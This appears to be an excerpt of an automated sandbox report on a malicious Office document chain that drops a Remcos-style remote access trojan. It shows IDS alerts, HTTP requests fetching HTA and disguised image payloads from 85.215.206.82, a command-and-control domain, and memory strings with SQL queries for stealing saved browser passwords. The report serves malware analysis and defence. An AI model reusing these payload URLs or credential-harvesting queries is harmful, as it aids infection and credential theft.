                  Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49174 -> 45.90.89.98:6498
                  Source: Network traffic | Suricata IDS: 2020423 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 : 85.215.206.82:80 -> 192.168.2.22:49173
                  Source: Network traffic | Suricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1 : 85.215.206.82:80 -> 192.168.2.22:49173
                  Source: Network traffic | Suricata IDS: 2049038 - Severity 1 - ET MALWARE Malicious Base64 Encoded Payload In Image : 216.58.212.129:443 -> 192.168.2.22:49172
                  Source: Malware configuration extractor | URLs: servemail.exprotedsteel.pro
                  Source: Yara match | File source: 19.2.powershell.exe.672aae8.0.raw.unpack, type: UNPACKEDPE
                  Source: global traffic | TCP traffic: 192.168.2.22:49174 -> 45.90.89.98:6498
                  Source: global traffic | HTTP traffic detected:
                      GET /uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur HTTP/1.1
                      Host: drive.google.com
                      Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected:
                      GET /download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download HTTP/1.1
                      Host: drive.usercontent.google.com
                      Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected:
                      GET /270/WRFFDCE.txt HTTP/1.1
                      Host: 85.215.206.82
                      Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected:
                      GET /json.gp HTTP/1.1
                      Host: geoplugin.net
                      Cache-Control: no-cache
                  Source: Joe Sandbox View | IP Address: 45.90.89.98
                  Source: Joe Sandbox View | IP Address: 178.237.33.50
                  Source: Joe Sandbox View | ASN Name: CMCSUS
                  Source: Joe Sandbox View | ASN Name: TWC-12271-NYCUS
                  Source: Joe Sandbox View | ASN Name: STRATOSTRATOAGDE
                  Source: Joe Sandbox View | JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
                  Source: Joe Sandbox View | JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
                  Source: Network traffic | Suricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: Network traffic | Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.22:49176 -> 178.237.33.50:80
                  Source: global traffic | HTTP traffic detected:
                      GET /clm3hy?&sing=cuddly&brain=hapless&kingfish=perpetual&cake=scientific&bacon=kindhearted&jelly=pumped&reveal=reflective&clock=agonizing&yak HTTP/1.1
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)
                      UA-CPU: AMD64
                      Accept-Encoding: gzip, deflate
                      Host: u4u.kids
                      Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected:
                      GET /270/weg/wg/deethebestthingwithmegreatattirudewithgreatthigns_________eniterlifewithgreatniceworkingskillwithmebgreatthignstobe________verynicepersonentiterlifewithnewthisnfds.doc HTTP/1.1
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)
                      UA-CPU: AMD64
                      Accept-Encoding: gzip, deflate
                      Host: 85.215.206.82
                      Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected:
                      GET /270/weg/wennedgreatthingswithgoodnwesforentrielifewithnew.hta HTTP/1.1
                      Accept: */*
                      Accept-Encoding: gzip, deflate
                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                      Host: 85.215.206.82
                      Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected:
                      GET /270/igetbestthingswithbestpicturewithgreatthingsonme.tIF HTTP/1.1
                      Accept: */*
                      Accept-Encoding: gzip, deflate
                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                      Host: 85.215.206.82
                      Connection: Keep-Alive
                  Source: unknown | HTTPS traffic detected: 24.199.88.84:443 -> 192.168.2.22:49162 version: TLS 1.0
                  Source: unknown | HTTPS traffic detected: 24.199.88.84:443 -> 192.168.2.22:49163 version: TLS 1.0
                  Source: unknown | HTTPS traffic detected: 24.199.88.84:443 -> 192.168.2.22:49164 version: TLS 1.0
                  Source: unknown | HTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.22:49171 version: TLS 1.0
                  Source: unknown | HTTPS traffic detected: 216.58.212.129:443 -> 192.168.2.22:49172 version: TLS 1.0
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.215.206.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.215.206.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.215.206.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.215.206.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.215.206.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.215.206.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.215.206.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.215.206.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.215.206.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.215.206.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.215.206.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.215.206.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.215.206.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.215.206.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.215.206.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.215.206.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.215.206.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.215.206.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.215.206.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.215.206.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.215.206.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.215.206.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.215.206.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.215.206.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.215.206.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.215.206.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.215.206.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.215.206.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.215.206.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.215.206.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.215.206.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.215.206.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.215.206.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.215.206.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.215.206.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.215.206.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.215.206.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.215.206.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.215.206.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.215.206.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.215.206.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.215.206.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.215.206.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.215.206.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.215.206.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.215.206.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.215.206.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.215.206.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.215.206.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.215.206.82
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00754548 URLDownloadToFileW,11_2_00754548
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{C04F3BA9-D42B-4460-B369-5ADD06F8F9F6}.tmpJump to behavior
                  Source: global trafficHTTP traffic detected: GET /clm3hy?&sing=cuddly&brain=hapless&kingfish=perpetual&cake=scientific&bacon=kindhearted&jelly=pumped&reveal=reflective&clock=agonizing&yak HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: u4u.kidsConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur HTTP/1.1Host: drive.google.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download HTTP/1.1Host: drive.usercontent.google.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /270/weg/wg/deethebestthingwithmegreatattirudewithgreatthigns_________eniterlifewithgreatniceworkingskillwithmebgreatthignstobe________verynicepersonentiterlifewithnewthisnfds.doc HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 85.215.206.82Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /270/weg/wennedgreatthingswithgoodnwesforentrielifewithnew.hta HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 85.215.206.82Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /270/igetbestthingswithbestpicturewithgreatthingsonme.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 85.215.206.82Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /270/WRFFDCE.txt HTTP/1.1Host: 85.215.206.82Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: Cookie:user@www.linkedin.com/ equals www.linkedin.com (Linkedin)
                  Source: CasPol.exe, 00000018.00000002.527130707.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
                  Source: CasPol.exe, CasPol.exe, 00000018.00000002.527130707.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
                  Source: CasPol.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                  Source: CasPol.exe, 00000016.00000002.531793309.0000000001D6C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: s://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login102 FROM nssPrivatekey3.dbkey4.dbSELECT origin_url, action_url, username_element, username_value, password_element, password_value, signon_realm, date_created from loginsLocal Stateos_cryptencrypted_keyDPAPICredReadACredFreeCredDeleteACredEnumerateACredEnumerateWSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2pstorec.dllPStoreCreateInstancehostnameencryptedUsernameencryptedPasswordusernameFieldpasswordFieldhttpRealmtimeCreatedtimeLastUsedtimePasswordChangedtimesUsedSELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword, timeCreated, timeLastUsed, timePasswordChanged, timesUsed FROM moz_loginssignons.txtsignons2.txtsignons3.txtsignons.sqlitelogins.jsoncrypt32.dllCryptUnprotectDataadvapi32.dllCryptAcquireContextCryptReleaseContextCryptCreateHashCryptGetHashParamCryptHashDataCryptDestroyHashCryptDecryptCryptDeriveKeyCryptImportKeyCryptDestroyKeyinternet explorerwininetcachecredentialsdpapi:"Account","Login Name","Password","Web Site","Comments"name,url,username,passwordWeb DataLogin Datafirefox.exeData\ProfileYandex\YandexBrowser\User Data\Default\Login DataVivaldi\User Data\Default\Login DataMicrosoftEdge*User DataGoogle\Chrome\User DataGoogle\Chrome SxS\User DataChromium\User DataLogin DataOpera\Opera\wand.datOpera\Opera7\profile\wand.datOperawand.datOpera Software\Opera Stable\Login Dataabe2869f-9b47-4cd9-a358-c22904dba7f7Microsoft_WinInetMicrosoft_WinInet_ ShowGridLinesSaveFilterIndexShowInfoTipMarkOddEvenRowsShowTimeInGMTLoadPasswordsIELoadPasswordsFirefoxLoadPasswordsChromeLoadPasswordsOperaLoadPasswordsSafariLoadPasswordsSeaMonkeyLoadPasswordsYandexLoadPasswordsVivaldiLoadPasswordsWaterfoxUseFirefoxProfileFolderUseFirefoxInstallFolder equals www.facebook.com (Facebook)
                  Source: CasPol.exe, 00000016.00000002.531793309.0000000001D6C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: s://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login102 FROM nssPrivatekey3.dbkey4.dbSELECT origin_url, action_url, username_element, username_value, password_element, password_value, signon_realm, date_created from loginsLocal Stateos_cryptencrypted_keyDPAPICredReadACredFreeCredDeleteACredEnumerateACredEnumerateWSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2pstorec.dllPStoreCreateInstancehostnameencryptedUsernameencryptedPasswordusernameFieldpasswordFieldhttpRealmtimeCreatedtimeLastUsedtimePasswordChangedtimesUsedSELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword, timeCreated, timeLastUsed, timePasswordChanged, timesUsed FROM moz_loginssignons.txtsignons2.txtsignons3.txtsignons.sqlitelogins.jsoncrypt32.dllCryptUnprotectDataadvapi32.dllCryptAcquireContextCryptReleaseContextCryptCreateHashCryptGetHashParamCryptHashDataCryptDestroyHashCryptDecryptCryptDeriveKeyCryptImportKeyCryptDestroyKeyinternet explorerwininetcachecredentialsdpapi:"Account","Login Name","Password","Web Site","Comments"name,url,username,passwordWeb DataLogin Datafirefox.exeData\ProfileYandex\YandexBrowser\User Data\Default\Login DataVivaldi\User Data\Default\Login DataMicrosoftEdge*User DataGoogle\Chrome\User DataGoogle\Chrome SxS\User DataChromium\User DataLogin DataOpera\Opera\wand.datOpera\Opera7\profile\wand.datOperawand.datOpera Software\Opera Stable\Login Dataabe2869f-9b47-4cd9-a358-c22904dba7f7Microsoft_WinInetMicrosoft_WinInet_ ShowGridLinesSaveFilterIndexShowInfoTipMarkOddEvenRowsShowTimeInGMTLoadPasswordsIELoadPasswordsFirefoxLoadPasswordsChromeLoadPasswordsOperaLoadPasswordsSafariLoadPasswordsSeaMonkeyLoadPasswordsYandexLoadPasswordsVivaldiLoadPasswordsWaterfoxUseFirefoxProfileFolderUseFirefoxInstallFolder equals www.yahoo.com (Yahoo)
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: www.linkedin.come equals www.linkedin.com (Linkedin)
                  Source: powershell.exe, 00000013.00000002.522222538.0000000005153000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                  Source: CasPol.exe, 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
                  Source: CasPol.exe, 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
                  Source: global trafficDNS traffic detected: DNS query: u4u.kids
                  Source: global trafficDNS traffic detected: DNS query: drive.google.com
                  Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
                  Source: global trafficDNS traffic detected: DNS query: servemail.exprotedsteel.pro
                  Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 23 Oct 2024 15:26:21 GMTContent-Type: text/html; charset=utf-8Content-Length: 144Connection: closeX-DNS-Prefetch-Control: offX-Frame-Options: SAMEORIGINStrict-Transport-Security: max-age=15552000; includeSubDomainsX-Download-Options: noopenX-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=blockContent-Security-Policy: default-src 'none'
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 23 Oct 2024 15:26:22 GMTContent-Type: text/html; charset=utf-8Content-Length: 144Connection: closeX-DNS-Prefetch-Control: offX-Frame-Options: SAMEORIGINStrict-Transport-Security: max-age=15552000; includeSubDomainsX-Download-Options: noopenX-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=blockContent-Security-Policy: default-src 'none'
                  Source: powershell.exe, 0000000B.00000002.455991013.000000000263A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.454994570.0000000000398000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.215.206.82/270/igetbestthingswithbestpicturewithgreatthingsonme.tIF
                  Source: EQNEDT32.EXE, 00000008.00000002.415353153.00000000008DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.215.206.82/270/weg/wennedgreatthingswithgoodnwesforentrielifewithnew.hta
                  Source: EQNEDT32.EXE, 00000008.00000002.415353153.00000000008DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.215.206.82/270/weg/wennedgreatthingswithgoodnwesforentrielifewithnew.hta:
                  Source: EQNEDT32.EXE, 00000008.00000002.415353153.00000000008DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.215.206.82/270/weg/wennedgreatthingswithgoodnwesforentrielifewithnew.htaj
                  Source: wg on 85.215.206.82.url.0.drString found in binary or memory: http://85.215.206.82/270/weg/wg/
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://acdn.adnxs.com/ast/ast.js
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.html
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://b.scorecardresearch.com/beacon.js
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://cache.btrll.com/default/Pix-1x1.gif
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://cdn.at.atwola.com/_media/uac/msn.html
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.js
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://cdn.taboola.com/libtrc/msn-home-network/loader.js
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.png
                  Source: powershell.exe, 00000013.00000002.522222538.0000000005153000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                  Source: powershell.exe, 00000013.00000002.522222538.0000000005153000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                  Source: powershell.exe, 00000013.00000002.522222538.0000000005153000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                  Source: powershell.exe, 00000013.00000002.522222538.0000000005153000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                  Source: powershell.exe, 00000013.00000002.522222538.0000000005153000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                  Source: powershell.exe, 00000013.00000002.522222538.0000000005153000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                  Source: powershell.exe, 00000013.00000002.522222538.0000000005153000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://csp.yahoo.com/beacon/csp?src=yahoocom-expect-ct-report-only
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2Fset
                  Source: CasPol.exe, CasPol.exe, 00000014.00000002.696341124.0000000000755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
                  Source: powershell.exe, 00000013.00000002.515289278.00000000038C8000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                  Source: CasPol.exe, 00000014.00000002.696341124.0000000000755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpE
                  Source: CasPol.exe, 00000014.00000002.696341124.0000000000755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpw
                  Source: powershell.exe, 0000000B.00000002.455991013.0000000002BF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids(
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_sh
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto%
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA2oHEB?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA42Hq5?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA42eYr?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA42pjY?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA6K5wX?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA6pevu?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA8I0Dg?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA8uJZv?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAHxwMU?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAJhH73?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAhvyvD?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtB8UA?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtBduP?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtBnuN?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtCLD9?h=368&w=522&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtCr7K?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtCzBA?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAyXtPP?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAzl6aj?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17cJeH?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dAYk?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dJEo?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dLTg?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dOHE?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dWNo?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dtuY?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e0XT?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
